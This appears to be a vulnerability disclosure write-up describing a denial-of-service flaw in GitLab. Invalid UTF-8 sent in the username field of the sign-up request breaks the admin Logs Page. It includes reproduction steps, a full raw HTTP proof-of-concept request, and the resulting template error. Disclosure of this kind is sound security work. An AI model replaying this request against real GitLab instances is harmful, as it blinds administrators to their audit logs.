[GITLAB] — Denial of service via “Login Panel” functionality.
After reporting the SSRF issues, I proceeded to explore the application. It was a matter of time to discover something else … A few hours later I identified “Denial Of Service” vulnerability that could be leveraged by the attacker in such manner as to block the administrative’s access to the “Log Audit Page”.
At first, the vulnerability was possible to be exploited only as an authenticated user. Then I noticed that the login form suffered from the same issue and it wasn’t mandatory to use a user account.
Steps to reproduce:
Append invalid utf8 character to the username field and forward the request.
POST /users HTTP/1.1
Host: 192.168.199.243
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.199.243/users/sign_in
Content-Type: application/x-www-form-urlencoded
Content-Length: 313
Connection: close
Cookie: sidebar_collapsed=false; convdev_intro_callout_dismissed=true; _gitlab_session=0bf82601779beb3b2508af113e208049; event_filter=all; hide_auto_devops_implicitly_enabled_banner_12=false
Upgrade-Insecure-Requests: 1utf8=%E2%9C%93&authenticity_token=MaS%2B21c7gMU6teJMur43ILwFU6KJetpGDgPIqIwbWDtbPOniGMmZasElptpXoimFLkAzotv5Df2Mvytbz9tUPQ%3D%3D&new_user%5Bname%5D=TESTDOS&new_user%5Busername%5D=TEESTDOS&new_user%5Bemail%5D=TESTDOS%40abv.bg&new_user%5Bemail_confirmation%5D=TESTDOS%40abv.bg&new_user%5Bpassword%5D=TESTDOS%40abv.bg
- Log in as Administrator and go to “Logs Page” in Admin panel.
- You won’t be able to open “Logs Page”.
The following page was shown:
The following error was triggered on the back-end.
ActionView::Template::Error (invalid byte sequence in UTF-8):
21: Scroll down
22: .file-content.logs
23: %ol
24: - klass.read_latest.each do |line|
25: %li
26: %p= lineImpact
Administrator won’t be able to see any logs through Gitlab Administrative panel.
